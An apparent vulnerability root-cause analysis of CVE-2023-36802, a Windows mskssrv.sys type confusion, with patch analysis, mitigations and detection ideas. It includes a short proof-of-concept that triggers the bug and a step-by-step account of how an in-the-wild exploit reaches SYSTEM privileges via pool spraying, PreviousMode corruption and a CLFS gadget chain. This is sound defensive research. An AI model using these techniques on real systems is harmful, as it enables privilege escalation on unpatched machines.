# CVE-2023-36802: Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability
*Benoît Sevens*

## The Basics

**Disclosure or Patch Date:** September 12, 2023

**Product:** Windows

**Advisory:** https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36802

**Affected Versions:**

* Windows 10 without KB5030211 or KB5030214
* Windows 11 without KB5030219 or KB5030217
* Windows Server 2019 without KB5030214
* Windows Server 2022 without KB5030216 or KB503025

**First Patched Version:**

* Windows 10 with KB5030211 or KB5030214
* Windows 11 with KB5030219 or KB5030217
* Windows Server 2019 with KB5030214
* Windows Server 2022 with KB5030216 or KB503025

**Issue/Bug Report:** N/A

**Patch CL:** N/A

**Bug-Introducing CL:** N/A

**Reporter(s):**

* Guanghui Xia (@ze0r) with Hebei HuaCe
* Quan Jin (@jq0904) & ze0r with DBAPPSecurity WeBin Lab
* Valentina Palmiotti with IBM X-Force
* Microsoft Threat Intelligence
* Microsoft Security Response Center

## The Code

**Proof-of-concept:**

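```c
// Note: the IOCTL_FRAMESERVER_* control codes are not defined in this write-up.
HANDLE h;
HRESULT hr;
DWORD bytesReturned;
char buf[0x100] = {0};

// Open a handle to the mskssrv device.
hr = KsOpenDefaultDevice(KSNAME_Server, GENERIC_READ | GENERIC_WRITE, &h);

// First IOCTL: makes FsContext2 point to an FsContextReg object.
memset(buf, 'A', sizeof(buf));
*(int32_t *)buf = 1;            // byte offset 0x00
*((int64_t *)buf + 3) = 0;      // byte offset 0x18
BOOL status = DeviceIoControl(h, IOCTL_FRAMESERVER_INIT_CONTEXT, &buf, sizeof(buf), &buf, sizeof(buf), &bytesReturned, 0);

// Second IOCTL on the same handle: FsContext2 is now used as an FsStreamReg object.
memset(buf, 'A', sizeof(buf));
*((DWORD*)buf + 8) = 1;         // byte offset 0x20
*((DWORD*)buf + 9) = 1;         // byte offset 0x24
status = DeviceIoControl(h, IOCTL_FRAMESERVER_PUBLISH_RX, &buf, sizeof(buf), &buf, sizeof(buf), &bytesReturned, 0);
```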

**Exploit sample:** Not public

**Did you have access to the exploit sample when doing the analysis?** Yes

## The Vulnerability

**Bug class:** Type confusion

**Vulnerability details:**

When an `IOCTL_FRAMESERVER_PUBLISH_RX` IOCTL is issued to the `mskssrv` device driver, `FSRendezvousServer::PublishRx()` is called, which in turn calls `FSStreamReg::PublishRx()`. `FSStreamReg::PublishRx()` takes whatever is in the `FsContext2` field of the `FILE_OBJECT` and uses it as a `FsStreamReg` object from then on, as long as it is a valid object.

An attacker can precede the `IOCTL_FRAMESERVER_PUBLISH_RX` with an `IOCTL_FRAMESERVER_INIT_CONTEXT` IOCTL on the same device handle, which initializes the `FsContext2` field to an object of a different type, namely `FsContextReg`.

`FSStreamReg::PublishRx()` performs several operations on what it thinks is a `FsStreamReg` object, some of which lead to exploitable scenarios, like writing out of bounds.

A similar vulnerability was present in three other IOCTLs:

* `IOCTL_FRAMESERVER_PUBLISH_TX`
* `IOCTL_FRAMESERVER_CONSUME_TX`
* `IOCTL_FRAMESERVER_CONSUME_RX`

All of these are referred to with the CVE-2023-36802 identifier.

**Patch analysis:**

Before the patch, `FSRendezvousServer::PublishRx()` would call `FSRendezvousServer::FindObject()` before calling into `FSStreamReg::PublishRx()`. `FSStreamReg::PublishRx()` is called only if `FSRendezvousServer::FindObject()` returns `TRUE`. However, `FSRendezvousServer::FindObject()` would not check the type of the object.

The patch changed `FSRendezvousServer::FindObject()` to check whether the type field of the object is set to 2, and to return `FALSE` otherwise. The type field is set to 2 when constructing a `FsStreamReg` object (in `FSStreamReg::FSStreamReg()`). Additionally, `FSRendezvousServer::FindObject()` was renamed to the more appropriate name `FSRendezvousServer::FindStreamObject()`.
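The effect of the patch can be illustrated with a small user-space model. This is only a sketch: the struct, the function names, and the type value used for the `FsContextReg`-like object are hypothetical, and the real function's lookup logic is not reproduced. Only the value 2 for the stream object comes from the analysis above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-ins for the driver's registration objects. */
enum reg_type {
    REG_TYPE_CONTEXT = 1, /* assumed value for the FsContextReg-like object */
    REG_TYPE_STREAM  = 2  /* the analysis states FsStreamReg sets its type to 2 */
};

struct reg_object {
    int type;
};

/* Pre-patch model: any object that is found is accepted, whatever its type. */
bool find_object_unpatched(const struct reg_object *obj)
{
    return obj != NULL;
}

/* Post-patch model: only objects whose type field equals 2 are accepted. */
bool find_stream_object_patched(const struct reg_object *obj)
{
    return obj != NULL && obj->type == REG_TYPE_STREAM;
}

/* Convenience constructor for trying out the two checks. */
struct reg_object make_reg_object(int type)
{
    assert(type == REG_TYPE_CONTEXT || type == REG_TYPE_STREAM);
    struct reg_object obj = { type };
    return obj;
}
```

In this model, an object built with `make_reg_object(REG_TYPE_CONTEXT)` passes `find_object_unpatched()` but is rejected by `find_stream_object_patched()`, which is the behavioral difference the patch introduces.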

**Thoughts on how this vuln might have been found _(fuzzing, code auditing, variant analysis, etc.)_:**

The bug could have been found via manual code auditing or fuzzing. Looking at the proof of concept above, a combination of two IOCTLs with relatively simple input buffers triggers a crash. Valentina Palmiotti found this vulnerability via manual code auditing as described in her [blog post](https://securityintelligence.com/x-force/critically-close-to-zero-day-exploiting-microsoft-kernel-streaming-service/).

**(Historical/present/future) context of bug:**

* June 16, 2023: CVE-2023-29360, another privilege escalation vulnerability inside `mskssrv.sys` which was used by Synacktiv at Pwn2Own 2023, is patched and publicly disclosed. Although within the same driver, CVE-2023-29360 is quite distinct from CVE-2023-36802.
* September 12, 2023: CVE-2023-36802 is patched and publicly disclosed, and reported to have been seen in the wild.
* October 10, 2023: Valentina Palmiotti [publishes](https://securityintelligence.com/x-force/critically-close-to-zero-day-exploiting-microsoft-kernel-streaming-service/) details of CVE-2023-36802 and its exploitation.

## The Exploit

(The terms *exploit primitive*, *exploit strategy*, *exploit technique*, and *exploit flow* are [defined here](https://googleprojectzero.blogspot.com/2020/06/a-survey-of-recent-ios-kernel-exploits.html).)

**Exploit strategy (or strategies):**

* Leak the addresses of relevant kernel objects via the well-known `NtQuerySystemInformation` technique.
* Create a kernel pool layout so that future `FSContextReg` allocations land in holes surrounded by attacker-controlled data.
* Allocate an `FSContextReg` object (via an `IOCTL_FRAMESERVER_INIT_CONTEXT` IOCTL).
* Trigger an out-of-bounds access on the `FSContextReg` object (via an `IOCTL_FRAMESERVER_PUBLISH_RX` IOCTL), whose writes are ultimately used to set the `PreviousMode` of the `KTHREAD` to 0.
* Use `NtReadVirtualMemory` and `NtWriteVirtualMemory` on kernel addresses to copy the system token to the `EPROCESS` of our current process.
* Clean up.
* Spawn a command of interest, such as `cmd.exe`.

**Exploit flow:**

Depending on the Windows version, two different exploit flows exist in the analyzed in-the-wild sample. This is because, depending on the Windows version:

* the `FSStreamReg::PublishRx` code is slightly different, i.e. recent `mskssrv.sys` versions contain a call to `ObfDereferenceObject` on one of the fields of the `FsStreamReg` object, while older versions don't.
* the structure layout of the `FsStreamReg` object is slightly different. This is important for side effects caused in the exploit flow.

Since newer `mskssrv.sys` versions contain a convenient call to `ObfDereferenceObject`, the exploit uses that call to decrement the `PreviousMode` field directly to 0. We will look at this exploit flow first.

Since older `mskssrv.sys` versions do not contain the convenient `ObfDereferenceObject` call, the exploit flow is a bit more convoluted. It corrupts a CLFS-specific object to call kernel gadgets via a vtable call.

#### CLFS-less exploit flow

* Open the `mskssrv` device via a call to `KsOpenDefaultDevice`.
* Leak some required kernel addresses via `NtQuerySystemInformation(SystemExtendedHandleInformation, ...)`:
    * the current `KTHREAD` address (and hence current `PreviousMode` address)
    * `EPROCESS` address of System process and current process (and hence their respective `Token` address)
    * `FILE_OBJECT` address of the `mskssrv` device file handle
* Spray the pool with objects of size 0x80 (excluding the 0x10 byte pool header), using a [well known named pipe technique](https://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation/blob/master/readme.md) of calling `NtFsControlFile` with fsctl code 0x119ff8.
* Close some pipes to create holes in the pool spray.
* Call the `IOCTL_FRAMESERVER_INIT_CONTEXT` IOCTL:
    * `FsInitializeContextRendezVous()` calls `FSRendezvousServer::InitializeContext()`
    * `FSRendezvousServer::InitializeContext()` allocates an `FsContextReg` object, which has a size of 0x78 bytes, and sets the `FsContext2` field in the `FILE_OBJECT` to point to this object. The `FsContextReg` object will take the spot of a previously created hole.
* Refill the remaining holes.
* Call the `IOCTL_FRAMESERVER_PUBLISH_RX` IOCTL, **in a separate thread**:
    * This will call into `FSRendezvousServer::PublishRx()` and subsequently `FSStreamReg::PublishRx()`.
    * `FSStreamReg::PublishRx()` will expect a `FsStreamReg` object in the `FsContext2` field, which is 0x1d8 bytes large, while in fact a smaller `FsContextReg` object is present, with attacker-controlled data in the neighboring chunks.
    * `FSStreamReg::PublishRx()` will then call `ObfDereferenceObject()` on a field taken out of bounds from a neighboring object. The attacker placed the `PreviousMode` address of the current thread there. This will decrement the `PreviousMode` of the main thread to 0. At this point the attacker can call `NtReadVirtualMemory` and `NtWriteVirtualMemory` on kernel addresses from the main thread.
    * If not taken care of, `FSStreamReg::PublishRx()` will now call `KeSetEvent` on another out-of-bounds field, which coincides with the `ProcessBilled` field from a pool header of a neighboring object (which is not attacker controlled). Since this is an invalid pointer, it would bugcheck the system. To prevent this, the attacker keeps `FSStreamReg::PublishRx()` locked in a while loop. This is achieved by forging a self-referencing linked list entry, so that `FSFrameMdlList::MoveNext` keeps returning the same list entry. The list entry is placed in usermode, so the exploit can break this while loop on demand (see below).
* Meanwhile in the main thread:
    * Try to read the System process token using `NtReadVirtualMemory` in a loop until it succeeds. After `PreviousMode` gets overwritten in the other thread, this will succeed.
    * Write the System token to the `EPROCESS` of the current process using `NtWriteVirtualMemory`.
    * Read the value of the `FsContext2` field out of the `FILE_OBJECT` to get the address of the `FsContextReg` object.
    * Read (for later restore) and overwrite the `ProcessBilled` in one of the neighboring pool chunk headers to NULL, so `KeSetEvent` will not crash the system.
    * Break the currently locked while loop in `FSStreamReg::PublishRx()` by changing the self-referencing list entry. `FSStreamReg::PublishRx()` will now proceed but not call `KeSetEvent` since the field is NULL.
    * Wait for `FSStreamReg::PublishRx()` to finish in the other thread.
    * Restore the corrupted `ProcessBilled` field to its original value.
    * Increment the refcount in the current `EPROCESS`.
    * Reset the `PreviousMode` to 1.
    * Launch a command of interest, such as `cmd.exe`.
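To make the layout in this flow easier to follow, the sketch below classifies an offset inside the 0x1d8-byte `FsStreamReg` view of the object. The sizes (0x78, 0x1d8, 0x80-byte chunk data, 0x10-byte pool header) come from the steps above. The assumptions that chunks are laid out back to back with a 0x90 stride and that the object starts at the beginning of its chunk's data are simplifications made for this model, and all names are hypothetical. The real field offsets used by `FSStreamReg::PublishRx()` are not given in this analysis and are not modeled.

```c
#include <assert.h>
#include <stddef.h>

#define CONTEXT_REG_SIZE 0x78u   /* size of the FsContextReg object */
#define STREAM_REG_SIZE  0x1d8u  /* size the code expects (FsStreamReg) */
#define CHUNK_DATA_SIZE  0x80u   /* sprayed object size, excluding header */
#define POOL_HEADER_SIZE 0x10u   /* pool header preceding each chunk's data */
#define CHUNK_STRIDE     (POOL_HEADER_SIZE + CHUNK_DATA_SIZE) /* assumed */

enum region { IN_OBJECT, IN_SLACK, IN_NEIGHBOR_HEADER, IN_NEIGHBOR_DATA };

struct location {
    enum region region;
    unsigned neighbor;        /* 0 = own chunk, 1 = next chunk, ... */
    size_t offset_in_region;  /* offset from the start of that region */
};

/* Map an offset in the confused object to the memory it actually touches. */
struct location classify_offset(size_t off)
{
    assert(off < STREAM_REG_SIZE);
    struct location loc = { IN_OBJECT, 0, off };

    if (off < CONTEXT_REG_SIZE)
        return loc;                       /* still inside the real object */
    if (off < CHUNK_DATA_SIZE) {
        loc.region = IN_SLACK;            /* unused tail of the own chunk */
        loc.offset_in_region = off - CONTEXT_REG_SIZE;
        return loc;
    }

    size_t past = off - CHUNK_DATA_SIZE;  /* bytes past the own chunk */
    size_t within = past % CHUNK_STRIDE;  /* position inside that neighbor */
    loc.neighbor = (unsigned)(past / CHUNK_STRIDE) + 1;
    if (within < POOL_HEADER_SIZE) {
        loc.region = IN_NEIGHBOR_HEADER;  /* not attacker controlled */
        loc.offset_in_region = within;
    } else {
        loc.region = IN_NEIGHBOR_DATA;    /* sprayed, attacker controlled */
        loc.offset_in_region = within - POOL_HEADER_SIZE;
    }
    return loc;
}
```

Under these assumptions, any field at offset 0x78 or beyond is read from outside the real object. Whether it falls in a neighboring pool header or in sprayed data determines whether the attacker controls it, which is why one field in this flow ends up overlapping `ProcessBilled`.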

#### Exploit flow with CLFS

On older systems, `FSStreamReg::PublishRx` does not contain a call to `ObfDereferenceObject`. This is unfortunate, as `ObfDereferenceObject` was a very easy primitive to decrement the `PreviousMode`.

However, `FSStreamReg::PublishRx()` will still call `FSFrameMdl::UnmapPages()` on an address taken out of bounds from a neighboring (sprayed) object, which will do a few useful writes at an address taken out of bounds:

* write QWORD 0 at offset 0xc8 from that address
* write DWORD 2 at offset 0x10 from that address

How does the exploit leverage this?

* Leak the required kernel addresses in the same way as in the CLFS-less exploit flow.
* Create a CLFS log file, open it and leak its kernel address (using `NtQuerySystemInformation(SystemExtendedHandleInformation, ...)`).
* Resolve some `nt` kernel gadgets: `PoFxProcessorNotification`, `IoSizeofWorkItem` and `RtlClearBit`.
* Forge a fake `CClfsContainer` object at 0x1000000 with a fake vtable at 0x1000800.
* Forge a fake `BitMapHeader` at 0x1000400 with a bitmap pointer pointing to the `PreviousMode` address.
* Spray the pool (again using `NtFsControlFile`), but the crafted objects now contain the kernel address of the CLFS log file + 0x2c9.
* Create holes, allocate the `FsContextReg` object in a hole and refill the remaining holes, just as before.
* Trigger `FSStreamReg::PublishRx()`. `FSFrameMdl::UnmapPages()` will be called on that address read out of bounds and hence write:
    * QWORD 0 at offset 0x2c9+0xc8=0x391 from the start of the CLFS log file in memory
    * DWORD 2 at offset 0x2c9+0x10=0x2d9 from the start of the CLFS log file in memory
* Call `CreateLogFile` which will end up calling `CClfsBaseFilePersisted::CheckSecureAccess`.
    * `CClfsBaseFilePersisted::CheckSecureAccess` will use the DWORD at offset 0x398 as an offset from the end of the log block header (of size 0x70) to find a `CLFS_CONTAINER_CONTEXT` object (via a call to `CClfsBaseFile::GetSymbol()`). But the QWORD write corrupted the least significant byte of that DWORD, which makes the offset change from 0x1460 to 0x1400. So now whatever is at CLFS log file+0x70+0x1400 will be interpreted as a `CLFS_CONTAINER_CONTEXT` object, which is attacker-controlled data. At offset 0x18 into this object, a pointer to a `CClfsContainer` object is dereferenced. The exploit places the address 0x1000000 as the pointer there, where it previously prepared a fake `CClfsContainer` object.
    * `CLFS!CClfsBaseFilePersisted::CheckSecureAccess` will then call the first function in the vtable of that object (which is under normal circumstances `CClfsContainer::AddRef`), passing the object itself as the first argument. The exploit placed the `nt!PoFxProcessorNotification` function in the fake vtable. (Note that there is CFG in the CLFS driver, so the exploit has to use allowed function addresses as gadgets.)
    * `nt!PoFxProcessorNotification` will dereference a few addresses of its argument and call one of these addresses with another one of these addresses as an argument. So now the exploit controls both the function that is called and its first argument. The exploit chooses `nt!RtlClearBit` as the function to be called.
    * `nt!RtlClearBit` expects 2 parameters: a pointer to a bitmap header (containing a pointer to the bitmap itself) and a bit number to clear. Recall the exploit prepared a fake bitmap header which has a bitmap pointer pointing to the `PreviousMode` address. The second argument - the bit number to clear - is not controlled but `rdx` is conveniently set to 0. `nt!RtlClearBit` will hence set the `PreviousMode` field to 0.
    * For stability, the exploit prepared a second vtable entry at `nt!IoSizeofWorkItem` - which does nothing but set `eax` - because later on `CClfsBaseFilePersisted::CheckSecureAccess` will call what it thinks is `CClfsContainer::Release`.
* Copy the System process token to the current `EPROCESS`.
* Restore the original 0x1460 offset in the CLFS log file.
* Restore the `PreviousMode` to 1.
* Launch a command of interest, such as `cmd.exe`.
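The offset arithmetic in this flow can be checked with a small user-space simulation. The sketch below applies the two writes to an ordinary byte buffer standing in for the CLFS log file in memory. The constants come from the steps above, while the function names are hypothetical and a little-endian host is assumed.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define MDL_BASE_OFFSET   0x2c9u /* sprayed pointer = log file base + 0x2c9 */
#define QWORD_WRITE_DELTA 0xc8u  /* QWORD 0 is written at pointer + 0xc8 */
#define DWORD_WRITE_DELTA 0x10u  /* DWORD 2 is written at pointer + 0x10 */
#define SYMBOL_OFFSET_POS 0x398u /* DWORD later used as the symbol offset */

/* Read a 32-bit value from an arbitrary (possibly unaligned) offset. */
uint32_t read_u32(const uint8_t *buf, size_t off)
{
    uint32_t value;
    memcpy(&value, buf + off, sizeof value);
    return value;
}

/* Write a 32-bit value to an arbitrary (possibly unaligned) offset. */
void write_u32(uint8_t *buf, size_t off, uint32_t value)
{
    memcpy(buf + off, &value, sizeof value);
}

/* Apply the two writes described above to a copy of the log file bytes. */
void apply_unmap_writes(uint8_t *log_file, size_t len)
{
    assert(len >= MDL_BASE_OFFSET + QWORD_WRITE_DELTA + sizeof(uint64_t));
    const uint64_t zero = 0;
    const uint32_t two = 2;
    /* QWORD 0 covers bytes 0x391..0x398, so it clips the byte at 0x398. */
    memcpy(log_file + MDL_BASE_OFFSET + QWORD_WRITE_DELTA, &zero, sizeof zero);
    /* DWORD 2 lands at 0x2d9. */
    memcpy(log_file + MDL_BASE_OFFSET + DWORD_WRITE_DELTA, &two, sizeof two);
}
```

If a buffer is prepared with `write_u32(buf, SYMBOL_OFFSET_POS, 0x1460)` and `apply_unmap_writes()` is then called on it, `read_u32(buf, SYMBOL_OFFSET_POS)` yields 0x1400. The 8-byte zero write starting at 0x391 ends exactly on the least significant byte of the DWORD at 0x398 and leaves its remaining bytes untouched.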

Note that in this version of `mskssrv.sys` and this exploit flow, the exploit didn't have to take care of the awkward `KeSetEvent` call. The reason is that the offset to the field passed to `KeSetEvent` in older versions of `mskssrv.sys` does not fall within a pool chunk header, but rather in controlled sprayed data and was set to NULL this way.
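Returning to the `nt!RtlClearBit` step of this flow, the effect of clearing bit 0 through a forged bitmap header can be modeled in user space. This is a simplified sketch and not the `nt` implementation: the struct layout and names are hypothetical, and a plain 32-bit variable stands in for the memory holding `PreviousMode` (where 1 is user mode and 0 is kernel mode).

```c
#include <assert.h>
#include <stdint.h>

/* Simplified bitmap header: a bit count plus a pointer to the bits. */
struct bitmap_header {
    uint32_t size_in_bits;
    uint32_t *buffer;
};

/* Clear a single bit in the bitmap that the header points to. */
void clear_bit(struct bitmap_header *hdr, uint32_t bit)
{
    assert(hdr != 0 && hdr->buffer != 0);
    assert(bit < hdr->size_in_bits);
    hdr->buffer[bit / 32] &= ~(UINT32_C(1) << (bit % 32));
}

/* Model of the step: the header's buffer points at the target word and
 * the bit number is 0, mirroring the uncontrolled but zero second argument. */
uint32_t clear_low_bit_via_header(uint32_t *target_word)
{
    struct bitmap_header fake_header = { 32, target_word };
    clear_bit(&fake_header, 0);
    return *target_word;
}
```

With a target word holding 1, `clear_low_bit_via_header()` leaves 0 behind. This is why an uncontrolled second argument is not a problem for the exploit as long as it happens to be 0: bit 0 is exactly the bit that distinguishes the two `PreviousMode` values.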

#### Notable differences with Valentina Palmiotti's exploit

It is an interesting exercise to understand the differences between the in the wild exploit described above and the exploit of Valentina Palmiotti as described in her [blog post](https://securityintelligence.com/x-force/critically-close-to-zero-day-exploiting-microsoft-kernel-streaming-service/).

Valentina's exploit is based on the recent `mskssrv.sys` versions. This can be deduced from the presence of an `ObfDereferenceObject` call in the screenshots. So let's compare her exploit with the "CLFS-less exploit flow".

* Valentina uses the "write 2 where" primitive provided by the `FSFrameMdl::UnmapPages()` call, "in conjunction with the I/O Ring technique". The exploit we analyzed used that primitive only for older `mskssrv.sys` versions (in conjunction with a CLFS technique), and used the "decrement where" primitive provided by the `ObfDereferenceObject()` call for newer `mskssrv.sys` versions.
* Valentina goes through some more complicated pool grooming in combination with an infoleak in `FSStreamReg::GetStats` to prevent a later `KeSetEvent` call from crashing on an invalid pointer. The exploit analyzed here uses a different solution: it triggers the `FSStreamReg::PublishRx` function from a separate thread and keeps it in a locked while loop (using a self-referencing linked list entry in usermode), which prevents the `KeSetEvent` call from being reached. Once it has kernel R/W, it changes the field that triggers the `KeSetEvent` to NULL and then changes the self-referencing linked list entry so the while loop breaks. This means the `KeSetEvent` call will be skipped. (Afterwards it restores the field that would have triggered the `KeSetEvent` call, because that field is the `ProcessBilled` pointer, i.e. the owning process's `EPROCESS`, in a pool chunk header.)
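The self-referencing list entry trick can be modeled with a few lines of user-space C. This is a sketch under assumptions: the loop's termination condition (reaching a sentinel entry) and all names are hypothetical, and the model bounds the walk with `max_steps` so that it always returns, whereas the real loop would keep spinning.

```c
#include <assert.h>
#include <stddef.h>

struct list_entry {
    struct list_entry *next;
};

/* Hypothetical stand-in for the list iterator: advance to the next entry. */
struct list_entry *move_next(struct list_entry *entry)
{
    return entry->next;
}

/* Walk from `start` until `sentinel` is reached or `max_steps` is spent.
 * Returns the number of steps taken. */
size_t walk_until(struct list_entry *start,
                  const struct list_entry *sentinel,
                  size_t max_steps)
{
    assert(start != NULL);
    size_t steps = 0;
    struct list_entry *cur = start;
    while (cur != sentinel && steps < max_steps) {
        cur = move_next(cur);   /* a self-referencing entry returns itself */
        steps++;
    }
    return steps;
}
```

An entry whose `next` points to itself exhausts any step budget, which corresponds to the kernel thread being parked in the loop. Once another thread rewrites `next` to point at the sentinel, the same walk finishes after a single step, which corresponds to the exploit releasing the loop on demand.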

**Known cases of the same exploit flow:**

The CVE-2022-37969 CLFS vulnerability, which was exploited in the wild, followed a very similar exploit flow, as described in [Zscaler's blog post](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part2-exploit-analysis).

**Part of an exploit chain?** This exploit was likely used as a standalone local privilege escalation.

## The Next Steps

### Variant analysis

**Areas/approach for variant analysis (and why):** Given the relatively simple nature of this vulnerability, as well as of CVE-2023-29360, more fuzzing and code auditing of `mskssrv.sys` could yield more bugs.

**Found variants:** N/A

### Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

**Ideas to kill the bug class:**

[CastGuard](https://i.blackhat.com/USA-22/Thursday/US-22-Bialek-CastGuard.pdf) could have potentially caught this bug, since it seems (based on their vtables) that both the `FsStreamReg` and `FsContextReg` types derive from the same `FsRegObject` class.

**Ideas to mitigate the exploit flow:**

* [MTE](https://github.com/saaramar/security_analysis_mte/blob/main/Security%20Analysis%20of%20MTE%20Through%20Examples.pdf) and [CHERI](https://github.com/microsoft/MSRC-Security-Research/blob/master/presentations/2021_08_BlackHatUSA/BHUSA21_Security_Analysis_of_CHERI_ISA.pdf) would not catch the type confusion, but would catch the out of bounds access as a consequence of the type confusion.
* [SMAP](https://github.com/microsoft/MSRC-Security-Research/blob/master/papers/2020/Evaluating%20the%20feasibility%20of%20enabling%20SMAP%20for%20the%20Windows%20kernel.pdf) would catch the user mode access in `FSStreamReg::PublishRx` when dereferencing the fake `FSFrameMdl` pointer in the CLFS-less exploit flow. In the CLFS exploit flow, SMAP would catch the fake `CClfsContainer` object vtable access in usermode.
* Remove kernel address leaks via `NtQuerySystemInformation` calls.
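The SMAP point can be illustrated with a small predicate. This is a deliberately simplified sketch: it assumes an x64 layout in which user-mode addresses occupy the lower canonical half, it ignores the mechanisms that let a kernel temporarily permit user accesses, and all names are hypothetical.

```c
#include <assert.h>   /* for callers that want to assert on the result */
#include <stdbool.h>
#include <stdint.h>

/* Assumed top of the user-mode half of the x64 canonical address space. */
#define USER_SPACE_TOP UINT64_C(0x00007FFFFFFFFFFF)

/* True if the address lies in the (assumed) user-mode range. */
bool is_user_address(uint64_t addr)
{
    return addr <= USER_SPACE_TOP;
}

/* Simplified SMAP rule: kernel-mode data access to a user address faults. */
bool smap_would_fault(uint64_t addr, bool cpu_in_kernel_mode, bool smap_enabled)
{
    return smap_enabled && cpu_in_kernel_mode && is_user_address(addr);
}
```

Under this model, the forged structures at 0x1000000, 0x1000400 and 0x1000800 described in the CLFS exploit flow are all user addresses, so a kernel-mode dereference of any of them would fault with SMAP enabled.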

**Other potential improvements:**

N/A

### 0-day detection methods

What are potential detection methods for similar 0-days? In other words, are there any ideas for how this exploit or similar exploits could be detected **as a 0-day**?

* Static signaturing of used exploit techniques (e.g. using Yara).
* Analysing samples based on interesting dynamic signals, such as `NtQuerySystemInformation` calls using the `SystemExtendedHandleInformation` parameter.
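As an illustration of the dynamic signal mentioned above, the sketch below counts `NtQuerySystemInformation` calls that request `SystemExtendedHandleInformation` (information class 64) in a recorded API trace. The trace record format and the function name are hypothetical. A real sandbox or EDR pipeline would supply its own event schema, and a non-zero count is only a triage signal, not proof of exploitation.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Value of SystemExtendedHandleInformation in SYSTEM_INFORMATION_CLASS. */
#define SYSTEM_EXTENDED_HANDLE_INFORMATION 64u

/* Hypothetical trace record: API name plus its first integer argument. */
struct api_call_record {
    const char *api_name;
    uint32_t first_arg;   /* for NtQuerySystemInformation: the info class */
};

/* Count calls that query the extended handle table. */
size_t count_extended_handle_queries(const struct api_call_record *records,
                                     size_t count)
{
    assert(records != NULL || count == 0);
    size_t hits = 0;
    for (size_t i = 0; i < count; i++) {
        if (strcmp(records[i].api_name, "NtQuerySystemInformation") == 0 &&
            records[i].first_arg == SYSTEM_EXTENDED_HANDLE_INFORMATION) {
            hits++;
        }
    }
    return hits;
}
```

Samples with a non-zero count could then be prioritized for manual analysis, ideally in combination with other signals, since legitimate tools also use this information class.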

## Other References

* [Critically close to zero(day): Exploiting Microsoft Kernel streaming service](https://securityintelligence.com/x-force/critically-close-to-zero-day-exploiting-microsoft-kernel-streaming-service/) by Valentina Palmiotti